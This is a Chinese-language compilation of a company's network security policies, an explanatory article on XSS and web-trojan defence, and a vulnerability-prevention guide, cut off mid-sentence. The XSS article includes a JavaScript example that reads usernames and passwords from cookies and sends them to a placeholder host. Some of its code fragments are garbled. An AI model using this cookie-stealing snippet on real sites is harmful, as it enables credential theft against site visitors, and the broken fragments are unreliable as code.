計(jì)算機(jī)信息網(wǎng)絡(luò)單位應(yīng)當(dāng)在根河市網(wǎng)絡(luò)安全主管部門監(jiān)督指導(dǎo)下， 建立和完善計(jì)算機(jī)網(wǎng)絡(luò)安全組織，成立計(jì)算機(jī)網(wǎng)絡(luò)安全領(lǐng)導(dǎo)小組。 1、確定本單位計(jì)算機(jī)安全管理責(zé)任人和安全領(lǐng)導(dǎo)小組負(fù)責(zé)人（由主管領(lǐng)導(dǎo)擔(dān)任），應(yīng)當(dāng)履行下列職責(zé)： （一）組織宣傳計(jì)算機(jī)信息網(wǎng)絡(luò)安全管理方面的法律、法規(guī)和有關(guān) 政策； （二）擬定并組織實(shí)施本單位計(jì)算機(jī)信息網(wǎng)絡(luò)安全管理的各項(xiàng)規(guī)章 制度；（三）定期組織檢查計(jì)算機(jī)信息網(wǎng)絡(luò)系統(tǒng)安全運(yùn)行情況，及時(shí)排除 各種安全隱患； （四）負(fù)責(zé)組織本單位信息安全審查；（五）負(fù)責(zé)組織本單位計(jì)算機(jī)從業(yè)人員的安全教育和培訓(xùn)； （六）發(fā)生安全事故或計(jì)算機(jī)違法犯罪案件時(shí)，立即向公安機(jī)關(guān)網(wǎng) 監(jiān)部門報(bào)告并采取妥善措施，保護(hù)現(xiàn)場(chǎng)，避免危害的擴(kuò)散，暢通與公安 機(jī)關(guān)網(wǎng)監(jiān)部門聯(lián)系渠道。 2、配備１至２名計(jì)算機(jī)安全員（由技術(shù)負(fù)責(zé)人和技術(shù)操作人員 組成），應(yīng)當(dāng)履行下列職責(zé)： （一）執(zhí)行本單位計(jì)算機(jī)信息網(wǎng)絡(luò)安全管理的各項(xiàng)規(guī)章制度； （二）按照計(jì)算機(jī)信息網(wǎng)絡(luò)安全技術(shù)規(guī)范要求對(duì)計(jì)算機(jī)信息系統(tǒng)安 全運(yùn)行情況進(jìn)行檢查測(cè)試，及時(shí)排除各種安全隱患；（三）根據(jù)法律法規(guī)要求，對(duì)經(jīng)本網(wǎng)絡(luò)或網(wǎng)站發(fā)布的信息實(shí)行 24 小時(shí)審核巡查， 發(fā)現(xiàn)傳輸有害信息， 應(yīng)當(dāng)立即停止傳輸， 防止信息擴(kuò)散， 保存有關(guān)記錄，并向公安機(jī)關(guān)網(wǎng)監(jiān)部門報(bào)告； （四）發(fā)生安全事故或計(jì)算機(jī)違法犯罪案件時(shí)，應(yīng)當(dāng)立即向本單位 安全管理責(zé)任人報(bào)告或直接向公安機(jī)關(guān)網(wǎng)監(jiān)部門報(bào)告，并采取妥善措 施，保護(hù)現(xiàn)場(chǎng)，避免危害的擴(kuò)大； （五）在發(fā)生網(wǎng)絡(luò)重大突發(fā)性事件時(shí)，計(jì)算機(jī)安全員應(yīng)隨時(shí)響應(yīng)， 接受公安機(jī)關(guān)網(wǎng)監(jiān)部門調(diào)遣，承擔(dān)處置任務(wù)； （六）我市計(jì)算機(jī)安全技術(shù)人員必須經(jīng)過市公安機(jī)關(guān)網(wǎng)監(jiān)部門認(rèn)可 的安全技術(shù)培訓(xùn)，考核合格后持證上崗。合格證有效期兩年。 3、單位安全組織應(yīng)保持與公安機(jī)關(guān)聯(lián)系渠道暢通，保證各項(xiàng)信 息網(wǎng)絡(luò)安全政策、法規(guī)在本單位的落實(shí)，積極接受公安機(jī)關(guān)網(wǎng)監(jiān)部門業(yè) 務(wù)監(jiān)督檢查。 4、單位安全組織的安全負(fù)責(zé)人及安全技術(shù)人員應(yīng)切實(shí)履行各項(xiàng) 安全職責(zé)，對(duì)不依法履行職責(zé)，造成安全事故和重大損害的，由公安機(jī) 關(guān)予以警告，并建議其所在單位給予紀(jì)律或經(jīng)濟(jì)處理；情節(jié)嚴(yán)重的，依 法追究刑事責(zé)任。 網(wǎng)絡(luò)信息監(jiān)視、保存、清除和備份制度 一、嚴(yán)格執(zhí)行國家及地方制定的信息安全條例。 二、上網(wǎng)用戶必須嚴(yán)格遵循網(wǎng)絡(luò)安全保密制度。 三、 提供的上網(wǎng)信息,必須經(jīng)過辦公主的審核后方可上網(wǎng),并及時(shí)予以登 記。 四、用戶必須配合有關(guān)部門依法進(jìn)行信息安全檢查。 五、 建立健全網(wǎng)絡(luò)安全管理制度,采取安全技術(shù)措施,落實(shí)安全管理責(zé)任, 加強(qiáng)對(duì) BBS 等交互式欄目信息發(fā)布的審核,網(wǎng)絡(luò)運(yùn)行日志的管理,并將系 統(tǒng)運(yùn)行日志完整僅用 3 個(gè)月以上,以備公安機(jī)關(guān)的監(jiān)督檢查。 六、"安全專管員"要加強(qiáng)網(wǎng)絡(luò)信息、監(jiān)測(cè),定期檢查安全情況、計(jì)算機(jī) 是否感染病毒并及時(shí)清除,同時(shí)應(yīng)配合網(wǎng)絡(luò)管理員對(duì)各開通服務(wù)器的系 統(tǒng)日志進(jìn)行不定期檢查,及時(shí)發(fā)現(xiàn)隱患及時(shí)匯報(bào)與處理。 七、對(duì)網(wǎng)絡(luò)上有害信息及時(shí)控制并刪除。嚴(yán)防非法用戶侵入我方網(wǎng)絡(luò)從 事非法活動(dòng),一經(jīng)發(fā)現(xiàn)及 時(shí)進(jìn)行相應(yīng)的技術(shù)處理,如及時(shí)清除有需信息 的傳播途徑、 關(guān)閉相應(yīng)的服務(wù)器等,并且保護(hù)好相關(guān)日志等數(shù)據(jù),及時(shí)向 有關(guān)部門報(bào)告。 八、出現(xiàn)有關(guān)網(wǎng)絡(luò)安全隱患及時(shí)上報(bào)辦公室,及時(shí)處理并作日志。 九、加強(qiáng)對(duì)用戶數(shù)據(jù)的管理,發(fā)現(xiàn)異常用戶,及時(shí)處理并上報(bào)辦 公室備 案。 十、定期組織網(wǎng)絡(luò)管理人員進(jìn)行安全管理學(xué)習(xí)和培訓(xùn)。 違法案件報(bào)告和協(xié)助查處制度 1、各接入單位應(yīng)當(dāng)自覺遵守網(wǎng)絡(luò)法規(guī)，嚴(yán)禁利用計(jì)算機(jī)從事違法犯罪 行為。 2、對(duì)于本單位發(fā)生的計(jì)算機(jī)違法犯罪行為，各級(jí)網(wǎng)絡(luò)管理員應(yīng)當(dāng)及時(shí) 制止并立即上報(bào)信息中心，同時(shí)做好系統(tǒng)保護(hù)工作。 3、對(duì)于所遭受到的攻擊，各接人單位同樣應(yīng)當(dāng)上報(bào)信息中心，同時(shí)做 好系統(tǒng)保護(hù)工作。 4、各接入單位有義務(wù)接受校網(wǎng)絡(luò)管理中心和上級(jí)主管部門的監(jiān)督、檢 查，并應(yīng)積極配合做好違法犯罪事件的查處工作。 5、信息中心應(yīng)及時(shí)掌握公司網(wǎng)內(nèi)各接入單位網(wǎng)絡(luò)違法情況，并定期向 主管領(lǐng)導(dǎo)和上級(jí)主管部門報(bào)告，并應(yīng)協(xié)助各主管部門做好查處工作。 信息發(fā)布、審核、登記制度 公司計(jì)算機(jī)信息發(fā)布實(shí)行各信息發(fā)布單位提出申請(qǐng)， 辦公室審核批 準(zhǔn)，信息中心具體實(shí)施的辦法，各部門在信息發(fā)布方面必須恪守如下規(guī) 定： 1、發(fā)布申請(qǐng)單位應(yīng)當(dāng)確保發(fā)布信息準(zhǔn)確、真實(shí)，符合國家有關(guān)的 各項(xiàng)法律、法規(guī)制度； 2、信息發(fā)布單位應(yīng)當(dāng)對(duì)所發(fā)布的信息備案記錄，以加強(qiáng)管理； 3、信息審核單位應(yīng)在充分理解國家有關(guān)的各項(xiàng)法律、法規(guī)制度的 基礎(chǔ)上及時(shí)處理申請(qǐng)單位的請(qǐng)求，并將審核意見及時(shí)反饋給申請(qǐng)單位； 4、在審核單位同意的基礎(chǔ)上應(yīng)將信息及時(shí)轉(zhuǎn)發(fā)給信息中心； 5、信息審核單位應(yīng)當(dāng)做好信息請(qǐng)求。處理、轉(zhuǎn)發(fā)的備案工作； 6、信息中心對(duì)所收到的經(jīng)過審核后的信息在確認(rèn)審核意見后，應(yīng) 及時(shí)在網(wǎng)上發(fā)布，并確保發(fā)布信息的準(zhǔn)確性； 7、信息中心對(duì)所發(fā)布的信息應(yīng)當(dāng)做好備案工作。 病毒檢測(cè)和網(wǎng)絡(luò)安全漏洞檢測(cè)制度 為保證我公司網(wǎng)的正常運(yùn)行，防止各類病毒、黑客軟件對(duì)公司內(nèi)網(wǎng) 主機(jī)構(gòu)成的威脅，大限度地減少此類損失，特制定本制度： 1、各接入部門計(jì)算機(jī)內(nèi)應(yīng)安裝防病毒軟件、防黑客軟件及垃圾郵件消 除軟件，并對(duì)軟件定期升級(jí)。 2、各接入單位計(jì)算機(jī)內(nèi)嚴(yán)禁安裝病毒軟件、黑客軟件，嚴(yán)禁攻擊其它 聯(lián)網(wǎng)主機(jī)，嚴(yán)禁散布黑客軟件和病毒。 3、信息中心應(yīng)定期檢測(cè)公司網(wǎng)內(nèi)病毒和安全漏洞，并采取必要措施加 以防治。 4、公司網(wǎng)內(nèi)主要服務(wù)器應(yīng)當(dāng)安裝防火墻系統(tǒng)，加強(qiáng)網(wǎng)絡(luò)安全管理。 5、信息中心定期對(duì)網(wǎng)絡(luò)安全和病毒檢測(cè)進(jìn)行檢查，發(fā)現(xiàn)問題及時(shí)處理。 帳號(hào)使用登記和操作權(quán)限管理制度 1、采取嚴(yán)密的安全措施防止無關(guān)用戶進(jìn)入系統(tǒng)； 2、數(shù)據(jù)庫管理系統(tǒng)的口令必須由電腦中心專人掌管，并要求定期更換。 禁止同一人掌管操作系統(tǒng)口令和數(shù)據(jù)庫管理系統(tǒng)口令； 3、操作人員應(yīng)有互不相同的用戶名，定期更換操作口令。 4、嚴(yán)禁操作人員泄露自己的操作口令；5、各崗位操作權(quán)限要嚴(yán)格按崗位職責(zé)設(shè)置。應(yīng)定期檢查操作員的權(quán)限； 6、重要崗位的登錄過程應(yīng)增加必要的限制措施； 安全管理人員崗位工作職責(zé) 1、在公安機(jī)關(guān)的指導(dǎo)下做好本單位計(jì)算機(jī)信息系統(tǒng)安全防范工作； 2、及時(shí)向公安機(jī)關(guān)提供安全保護(hù)所需的資料； 3、負(fù)責(zé)本單位計(jì)算機(jī)信息系統(tǒng)安全知識(shí)的宣傳教育工作； 4、定期對(duì)本單位的計(jì)算機(jī)信息系統(tǒng)進(jìn)行檢查。 安全教育和培訓(xùn)制度 1、網(wǎng)絡(luò)管理中心應(yīng)定期召開網(wǎng)絡(luò)安全會(huì)議，通報(bào)網(wǎng)絡(luò)安全狀況，解決 網(wǎng)絡(luò)安全問題： 2、網(wǎng)絡(luò)管理中心應(yīng)定期開發(fā)網(wǎng)絡(luò)安全培訓(xùn)班，學(xué)習(xí)網(wǎng)絡(luò)法律、法規(guī)， 提高各接入單位的網(wǎng)絡(luò)安全意識(shí)，提高網(wǎng)絡(luò)安全水平。 3、各接入部門應(yīng)積極配合網(wǎng)絡(luò)管理中心的工作，自覺參加各種培訓(xùn)活 動(dòng)。 4、網(wǎng)絡(luò)管理中心應(yīng)當(dāng)定期對(duì)學(xué)生進(jìn)行網(wǎng)絡(luò)安全教育，強(qiáng)化網(wǎng)絡(luò)安全意 識(shí)。增強(qiáng)守法觀念。 其他與安全保護(hù)相關(guān)的管理制度 1、嚴(yán)格機(jī)房管理。建立完整的計(jì)算機(jī)運(yùn)行日志、操作記錄及其它與安 全有關(guān)的資料；機(jī)房必須有當(dāng)班值班人員；嚴(yán)禁易燃易爆和強(qiáng)磁物品及 其它與機(jī)房工作無關(guān)的物品進(jìn)入機(jī)房。 2、加強(qiáng)技術(shù)資料管理。明確責(zé)任人，重要技術(shù)資料應(yīng)有副本并異地存 放。 3、建立軟件開發(fā)及管理制度。開發(fā)維護(hù)人員與操作人員必須實(shí)行崗位 分離，開發(fā)環(huán)境和現(xiàn)場(chǎng)必須與生產(chǎn)環(huán)境和現(xiàn)場(chǎng)隔離。 

摘要：隨著計(jì)算機(jī)網(wǎng)絡(luò)技術(shù)的迅速發(fā)展，網(wǎng)絡(luò)安全問題已變得越來越受到人們的重視，網(wǎng)絡(luò)攻擊形式多種多樣，很多蠕蟲病毒、木馬病毒等植入到某些網(wǎng)頁中，給網(wǎng)絡(luò)用戶帶來了很大的安全隱患。其中XSS跨網(wǎng)站腳本攻擊，惡意攻擊者往Web頁面里插入惡意html代碼，當(dāng)用戶瀏覽該頁之時(shí)，嵌入其中Web里面的html代碼會(huì)被執(zhí)行，從而達(dá)到惡意攻擊用戶的特殊目的。本文主要闡述了XSS的機(jī)理和特點(diǎn)，重點(diǎn)分析了網(wǎng)頁代碼的檢測(cè)以及木馬的特征，并針對(duì)這些特點(diǎn)進(jìn)行了一些相應(yīng)防范對(duì)策的探討。關(guān)鍵詞：網(wǎng)頁木馬； XSS； 攻擊； 防范一、前言網(wǎng)頁木馬是一種新型的惡意代碼，一些攻擊者將它人為的植入到服務(wù)器端的HTML頁面中，通過客戶端對(duì)服務(wù)器的訪問來傳播惡意攻擊代碼，它主要是通過瀏覽器以及其中的一些插件漏洞來進(jìn)行植入，網(wǎng)頁木馬是一種客戶端的攻擊方式，它能有效的繞過防火墻的檢測(cè)，隱秘的在客戶端將惡意代碼植入，客戶端在不知情的情況下將這些惡意可執(zhí)行程序進(jìn)行下載和執(zhí)行。給互聯(lián)網(wǎng)用戶造成嚴(yán)重的安全威脅。在Web 2.0出現(xiàn)以后，XSS的危害性達(dá)到了十分嚴(yán)重的地步。跨站腳本英文名稱是（Cross Site Script），為了與層疊樣式表（Cascading Style Sheets簡(jiǎn)稱CSS）區(qū)分，故命名為XSS。 XSS攻擊是指入侵者在遠(yuǎn)程WEB頁面的HTML代碼中插入具有惡意目的的數(shù)據(jù)，用戶認(rèn)為該頁面是可信賴的，但是當(dāng)瀏覽器下載該頁面時(shí)，嵌入其中的腳本將被解釋執(zhí)行。XSS具有自身的獨(dú)有特點(diǎn)，目前國內(nèi)外很多研究人員圍繞XSS的防御進(jìn)行了深入的探討與研究，同時(shí)攻擊者也在采用一些更先進(jìn)的手段來提高木馬的攻擊隱蔽性，用以提高木馬的攻擊成功率，因此，XSS的機(jī)理與防范對(duì)策研究已成為了當(dāng)前計(jì)算機(jī)工作者的一個(gè)重要課題。二、XSS的機(jī)理與特征1.XSS的成因跨網(wǎng)站腳本XSS漏洞的成因其實(shí)就是Html的注入問題，攻擊者的輸入沒有經(jīng)過嚴(yán)格的控制進(jìn)入了數(shù)據(jù)庫，最終顯示給來訪的用戶，導(dǎo)致可以在來訪用戶的瀏覽器里以瀏覽用戶的身份執(zhí)行Html代碼，數(shù)據(jù)流程如下：攻擊者的Html輸入—>web程序—>進(jìn)入數(shù)據(jù)庫—>web程序—>用戶瀏覽器。目前，所有的網(wǎng)站上幾乎都提供一個(gè)站內(nèi)或站外信息搜索框。在此搜索框中，您可以搜索到網(wǎng)站上任何可用的東西。這個(gè)搜索表單看起來這樣：圖1-1圖1-2內(nèi)部代碼：窗體頂端窗體底端“搜索”                             在asp網(wǎng)頁上顯示的搜索結(jié)果，同時(shí)它也列出了在“關(guān)鍵字”的搜索結(jié)果。web頁面上,不管用戶搜索什么內(nèi)容，它將顯示搜索結(jié)果在網(wǎng)頁上。現(xiàn)在如果一個(gè)攻擊者嘗試注入惡意腳本，比如在搜索框中輸入如下Html代碼：“”則代碼會(huì)變成<input type="text" name="q" value=""   />，嵌入的JavaScript代碼將會(huì)被瀏覽器執(zhí)行，將顯示一個(gè)警告框，提示“XSS跨站腳本攻擊”。而不能完成用戶搜索功能。（上述兩個(gè)網(wǎng)站已經(jīng)做XSS過濾，不能看見警告框）下面是一個(gè)關(guān)于用戶注冊(cè)頁面的例子,當(dāng)然這個(gè)示例很簡(jiǎn)單，幾乎攻擊不到任何網(wǎng)站，僅僅看看其原理。我們知道很多網(wǎng)站都提供用戶注冊(cè)功能，網(wǎng)站后臺(tái)數(shù)據(jù)庫存儲(chǔ)用戶名、密碼，方便用戶下次登錄，有些網(wǎng)站是直接用明文記錄用戶名、密碼，惡意用戶注冊(cè)賬戶登錄后使用簡(jiǎn)單工具查看cookie結(jié)構(gòu)名稱后，如果網(wǎng)站有XSS漏洞，那么簡(jiǎn)單的就可以獲取其它用戶的用戶名、密碼了。圖2-1如圖2-1所示的用戶注冊(cè)頁面。允許用戶填入注冊(cè)信息，然后存儲(chǔ)到后臺(tái)數(shù)據(jù)庫中。因?yàn)槲覀兺耆湃瘟擞脩糨斎耄脩糇?cè)信息都能正確的進(jìn)入數(shù)據(jù)庫。但有些惡意的用戶會(huì)利用這個(gè)漏洞輸入HTML和JS代碼，例如這段代碼直接輸入到“用戶名”欄中，竊取用戶信息。在http://www.123.com/h.js中：var username=CookieHelper.getCookie('username').value；var password=CookieHelper.getCookie('password').value；var script =document.createElement('script')；script.src='http://www.123.com/index.asp?username='+username+'&password='+password；document.body.appendChild(script)；這樣就輕松的獲取了cookie中的用戶名和密碼。2.跨網(wǎng)站腳本攻擊的類型2.1非持久性跨網(wǎng)站腳本攻擊，非持久性 XSS 也稱為是反射跨網(wǎng)站漏洞。它是最常見的 XSS 類型。在這，注入數(shù)據(jù)反射給攻擊者。上面的例1，是非持續(xù)的攻擊。典型的非持久性 XSS 包含與 XSS 的鏈接。    2.2持久性跨網(wǎng)站腳本攻擊（存儲(chǔ)性），持久性跨網(wǎng)站腳本是存儲(chǔ)跨站點(diǎn)腳本。當(dāng)它發(fā)生時(shí) XSS 變量存儲(chǔ)在網(wǎng)站的數(shù)據(jù)庫，每當(dāng)用戶打開網(wǎng)頁時(shí)執(zhí)行。每次用戶打開瀏覽器，腳本執(zhí)行。持久性 XSS 比非持久性 XSS更有害，因?yàn)槊慨?dāng)用戶打開要查看的內(nèi)容的網(wǎng)頁時(shí)，將自動(dòng)執(zhí)行該腳本。上面例2就是持久性跨網(wǎng)站腳本攻擊。   2.3基于DOM的跨站腳本攻擊，基于 DOM 的 XSS 有時(shí)也稱為“type-0 XSS”。它發(fā)生時(shí)， XSS 變量執(zhí)行由 DOM 修改用戶的瀏覽器網(wǎng)頁的結(jié)果。在客戶端的 HTTP 響應(yīng)不會(huì)更改，但以惡意的方式執(zhí)行的腳本。三、XSS防范對(duì)策XSS攻擊的模式很簡(jiǎn)單，就是把自己的代碼嵌入到頁面里，隨頁面一塊執(zhí)行；XSS攻擊的防范也一樣簡(jiǎn)單，對(duì)于網(wǎng)站的開發(fā)者，首先應(yīng)該把精力放到對(duì)所有用戶提交內(nèi)容進(jìn)行可靠的輸入驗(yàn)證上。這些提交內(nèi)容包括HTML、URL、查詢關(guān)鍵字、http頭、post、get數(shù)據(jù)等。只接受在你所規(guī)定長(zhǎng)度范圍內(nèi)、采用適當(dāng)格式、你所希望的字符。阻塞、過濾或者忽略其它的任何東西。針對(duì)出現(xiàn)在不同位置的用戶輸入內(nèi)容，其處理策略有所不同。1、html只需要處理掉< > 即可，只要沒有html標(biāo)簽，頁面就是安全的。可以使用asp內(nèi)置方法Replace (str,“<”,“<”) replace="">”,“>”) 來處理待輸出的內(nèi)容，將<,>, 轉(zhuǎn)義。2、JS將要輸出到j(luò)s代碼片斷中的用戶輸入內(nèi)容沒有好的辦法進(jìn)行處理；僅轉(zhuǎn)義少數(shù)字符不能保證去掉所有的攻擊可能。因此，一般建議不要把用戶產(chǎn)生的內(nèi)容直接輸出到j(luò)s片斷中。如果條件所限，必須將內(nèi)容直接輸出，有如下方法可供選擇：1) 如果待輸出的內(nèi)容有特定的取值返回或者特定的格式，可以使用白名單或者正則表達(dá)式進(jìn)行處理。2) 可以將內(nèi)容輸出到html的隱藏標(biāo)簽或隱藏表單中，js通過獲取標(biāo)簽的內(nèi)容得到該內(nèi)容。3、檢查那么，對(duì)已有的頁面，該如何檢查呢？這個(gè)問題的回答是，目前沒有很好的辦法能完全檢查出服務(wù)器中可能存在XSS攻擊的頁面；有一些辦法可以檢查出比較明顯的疏漏，其基本思路如下：1）從apache的access_log中取出所有unique的請(qǐng)求，依次修改其某一個(gè)參數(shù)為 “”，發(fā)起請(qǐng)求。2）獲取返回的內(nèi)容，如果內(nèi)容中有原樣的該字符串，表明此可疑輸入沒有經(jīng)過處理便輸出到頁面上，頁面存在隱患，需要處理。通過這種辦法，可以檢查出絕大多數(shù)能通過get請(qǐng)求發(fā)起的XSS攻擊。那些在access_log沒有出現(xiàn)的請(qǐng)求參數(shù)，這里沒有檢查到，可能有所遺漏，就需要手動(dòng)去整理，測(cè)試。通過Post發(fā)起的請(qǐng)求需要用另外一種策略進(jìn)行檢查。其思路如下：將網(wǎng)站上所有可以輸入的表單，依次輸入特征字符串，比如說< ' ” >，如果提交后產(chǎn)生的頁面中含有未處理的此字符串，說明存在隱患。通過以上分析我們看到，XSS是一種危害較大、較難防范，并且更加隱蔽的攻擊方式。其實(shí)只要明白其原理，再加上勤加思考防范的對(duì)策，就可以根治XSS漏洞。沈陽凱鴻科技有限公司2023/1/1

一、緩沖區(qū)溢出漏洞當(dāng)軟件程序試圖讀取或?qū)懭氤龇秶木彌_區(qū)時(shí)，就會(huì)發(fā)生緩沖區(qū)溢出。它可能導(dǎo)致覆蓋或在現(xiàn)有代碼中附加數(shù)據(jù)。緩沖區(qū)溢出可使攻擊者執(zhí)行代碼、更改程序流、讀取敏感數(shù)據(jù)或使系統(tǒng)崩潰等。包括：接受長(zhǎng)度不受限制的輸入允許從無效索引對(duì)數(shù)組進(jìn)行讀取操作緩沖區(qū)溢出漏洞通常發(fā)生在體系結(jié)構(gòu)和設(shè)計(jì)、實(shí)施或操作階段。這一漏洞最常見于 C，C ++ 和 Assembly 程序，可以以任何缺少內(nèi)存管理支持的語言出現(xiàn)。如何防范？盡可能選擇一種防止或降低此漏洞風(fēng)險(xiǎn)的語言，例如：Java 或 Perl。不要禁用溢出保護(hù)，例如在 C＃ 中。與環(huán)境中的易受攻擊的本機(jī)代碼交互時(shí)，即使是“免疫”語言也可能會(huì)產(chǎn)生錯(cuò)誤。為了防止利用緩沖區(qū)溢出漏洞，可以使用包含功能或擴(kuò)展名以限制輸入的編譯器。例如， Visual Studio 或 StackGuard。還可以使用工具在內(nèi)存中隨機(jī)排列程序組件。使地址更難以識(shí)別或預(yù)測(cè)，從而使攻擊者難以利用特定組件。最后，在創(chuàng)建代碼時(shí)，確保正確分配了緩沖區(qū)空間。另外，使用允許限制輸入大小的方法和功能。二、對(duì)輸入的驗(yàn)證當(dāng)用戶輸入在接受時(shí)未得到驗(yàn)證或驗(yàn)證不足時(shí)，就會(huì)發(fā)生輸入驗(yàn)證不當(dāng)。不正確的驗(yàn)證可以使攻擊者執(zhí)行惡意代碼、更改程序流、訪問敏感數(shù)據(jù)或?yàn)E用資源分配。包括：假設(shè)攻擊者無法訪問隱藏的表單字段僅驗(yàn)證輸入的長(zhǎng)度而不是內(nèi)容通常發(fā)生在架構(gòu)、設(shè)計(jì)和實(shí)施階段。它可以在任何接受外部數(shù)據(jù)的語言或系統(tǒng)中發(fā)生。預(yù)防措施應(yīng)該對(duì)任何用戶采取“零信任”原則，并假設(shè)所有輸入都是有害的，直到證明安全為止。使用白名單以確保輸入內(nèi)容僅包含可接受的格式和內(nèi)容。在驗(yàn)證輸入時(shí)，長(zhǎng)度、類型、語法和對(duì)邏輯的符合性（即輸入具有語義意義）。可以使用多種工具來確保進(jìn)行充分的驗(yàn)證，例如 OWASP ESAPI 驗(yàn)證 API 和 RegEx。使用這些工具來驗(yàn)證所有輸入源，包括環(huán)境變量，查詢，文件，數(shù)據(jù)庫和 API 調(diào)用。確保在客戶端和服務(wù)器端都執(zhí)行檢查。可以繞過客戶端驗(yàn)證，因此需要仔細(xì)檢查。如果繞過客戶端驗(yàn)證，則在服務(wù)器端捕獲輸入可以幫助你識(shí)別攻擊者的操縱。在進(jìn)行任何必要的組合或轉(zhuǎn)換后，請(qǐng)驗(yàn)證輸入。三、信息泄露當(dāng)有意或無意將數(shù)據(jù)提供給潛在攻擊者時(shí)，就會(huì)發(fā)生信息泄露。數(shù)據(jù)可以包含敏感信息，也可以向攻擊者提供有關(guān)可以在攻擊中利用的軟件或環(huán)境的信息。信息公開的示例包括：顯示文件或程序完整路徑的錯(cuò)誤錯(cuò)誤消息暴露了數(shù)據(jù)庫中用戶的存在信息泄漏漏洞通常發(fā)生在開發(fā)的體系結(jié)構(gòu)和設(shè)計(jì)或?qū)嵤╇A段。任何語言都可能發(fā)生這些漏洞。預(yù)防措施為防止信息泄露，應(yīng)該設(shè)計(jì)程序體系結(jié)構(gòu)以將敏感信息包含在具有明確信任邊界的區(qū)域中。確保使用訪問控制來保護(hù)和限制“安全”區(qū)域與端點(diǎn)之間的連接。為了最大程度地利用漏洞，請(qǐng)驗(yàn)證錯(cuò)誤消息和用戶警告中是否包含不必要的信息。還應(yīng)該限制來自 URL 和通信標(biāo)頭的敏感信息。例如，模糊完整的路徑名或 API 密鑰。四、權(quán)限認(rèn)證不當(dāng)如果未正確分配、跟蹤、修改或驗(yàn)證用戶權(quán)限和憑據(jù)，則會(huì)發(fā)生不正確的權(quán)限或身份驗(yàn)證。這些漏洞可使攻擊者濫用權(quán)限，執(zhí)行受限任務(wù)或訪問受限數(shù)據(jù)。包括：不可逆轉(zhuǎn)的臨時(shí)權(quán)限升級(jí)。通過黑名單而不是白名單來限制權(quán)限。允許較低的權(quán)限級(jí)別影響較高的權(quán)限帳戶，例如：重置管理員密碼。無限制的登錄嘗試或會(huì)話限制。權(quán)限或身份驗(yàn)證漏洞通常在開發(fā)的體系結(jié)構(gòu)和設(shè)計(jì)，實(shí)施或操作階段引入。任何語言都可能發(fā)生這些漏洞。預(yù)防措施應(yīng)該將最小權(quán)限原則應(yīng)用于軟件和系統(tǒng)交互的所有用戶和服務(wù)。通過在整個(gè)程序和環(huán)境中應(yīng)用訪問控制來限制用戶和實(shí)體的功能。將權(quán)限限制為僅用戶或服務(wù)所需的那些資源。此外，將高級(jí)權(quán)限分成多個(gè)角色。分離有助于限制“高級(jí)用戶”，并降低攻擊者濫用訪問權(quán)限的能力。還可以應(yīng)用多因素身份驗(yàn)證方法來防止攻擊者繞過系統(tǒng)或獲得輕松的訪問權(quán)限。五、減少一般漏洞的措施除了采取針對(duì)特定漏洞的措施外，還應(yīng)該采取一些措施來總體上減少漏洞。例如：注威脅情報(bào)時(shí)刻關(guān)注威脅情報(bào)，了解新漏洞、新補(bǔ)丁、新舉措，防范于未然。進(jìn)行漏洞評(píng)估軟件進(jìn)行定期的滲透測(cè)試，提高軟件安全性，在攻擊者之前發(fā)現(xiàn)潛在漏洞的存在，并做好相應(yīng)的應(yīng)對(duì)措施。沈陽凱鴻科技有限公司2023/1/1

一、網(wǎng)站運(yùn)行安全保障措施1、網(wǎng)站服務(wù)器和其他計(jì)算機(jī)之間設(shè)置防火墻，做好安全策略，拒絕外來的惡意程序攻擊，保障網(wǎng)站正常運(yùn)行。2、在網(wǎng)站的服務(wù)器及工作站上均安裝了相應(yīng)的防病毒軟件，對(duì)計(jì)算機(jī)病毒、有害電子郵件有整套的防范措施，防止有害信息對(duì)網(wǎng)站系統(tǒng)的干擾和破壞。3、做好訪問日志的留存。網(wǎng)站具有保存三個(gè)月以上的系統(tǒng)運(yùn)行日志和用戶使用日志記錄功能，內(nèi)容包括IP地址及使用情況，主頁維護(hù)者、對(duì)應(yīng)的IP地址情況等。4、交互式欄目具備有IP地址、身份登記和識(shí)別確認(rèn)功能，對(duì)非法貼子或留言能做到及時(shí)刪除并進(jìn)行重要信息向相關(guān)部門匯報(bào)5、網(wǎng)站信息服務(wù)系統(tǒng)建立多機(jī)備份機(jī)制，一旦主系統(tǒng)遇到故障或受到攻擊導(dǎo)致不能正常運(yùn)行，可以在最短的時(shí)間內(nèi)替換主系統(tǒng)提供服務(wù)。6、關(guān)閉網(wǎng)站系統(tǒng)中暫不使用的服務(wù)功能，及相關(guān)端口，并及時(shí)用補(bǔ)丁修復(fù)系統(tǒng)漏洞，定期查殺病毒。7、服務(wù)器平時(shí)處于鎖定狀態(tài)，并保管好登錄密碼；后臺(tái)管理界面設(shè)置超級(jí)用戶名及密碼，并綁定IP，以防他人登入。8、網(wǎng)站提供集中式權(quán)限管理，針對(duì)不同的應(yīng)用系統(tǒng)、終端、操作人員，由網(wǎng)站系統(tǒng)管理員設(shè)置共享數(shù)據(jù)庫信息的訪問權(quán)限，并設(shè)置相應(yīng)的密碼及口令。不同的操作人員設(shè)定不同的用戶名，且定期更換，嚴(yán)禁操作人員泄漏自己的口令。對(duì)操作人員的權(quán)限嚴(yán)格按照崗位職責(zé)設(shè)定，并由網(wǎng)站系統(tǒng)管理員定期檢查操作人員權(quán)限。9、公司機(jī)房按照電信機(jī)房標(biāo)準(zhǔn)建設(shè)，內(nèi)有必備的獨(dú)立UPS不間斷電源，能定期進(jìn)行電力、防火、防潮、防磁和防鼠檢查。二、信息安全保密管理制度1、建立健全的信息安全保密管理制度，實(shí)現(xiàn)信息安全保密責(zé)任制，切實(shí)負(fù)起確保網(wǎng)絡(luò)與信息安全保密的責(zé)任。嚴(yán)格按照個(gè)人負(fù)責(zé)原則，落實(shí)責(zé)任制，明確責(zé)任人和職責(zé)，細(xì)化工作措施和流程，建立完善管理制度和實(shí)施辦法，確保使用網(wǎng)絡(luò)和提供信息服務(wù)的安全。2、網(wǎng)站信息內(nèi)容更新全部由網(wǎng)站工作人員完成或管理，工作人員素質(zhì)高、專業(yè)水平好，有強(qiáng)烈的責(zé)任心和責(zé)任感。網(wǎng)站相關(guān)信息發(fā)布之前有一定的審核程序。工作人員采集信息將嚴(yán)格遵守國家的有關(guān)法律、法規(guī)和相關(guān)規(guī)定。嚴(yán)禁通過網(wǎng)站散布《互聯(lián)網(wǎng)信息管理辦法》等相關(guān)法律法規(guī)明令禁止的信息（即“九不準(zhǔn)”），一經(jīng)發(fā)現(xiàn)，立即刪除。3、遵守對(duì)網(wǎng)站服務(wù)信息監(jiān)視，保存、清除和備份的制度。開展對(duì)網(wǎ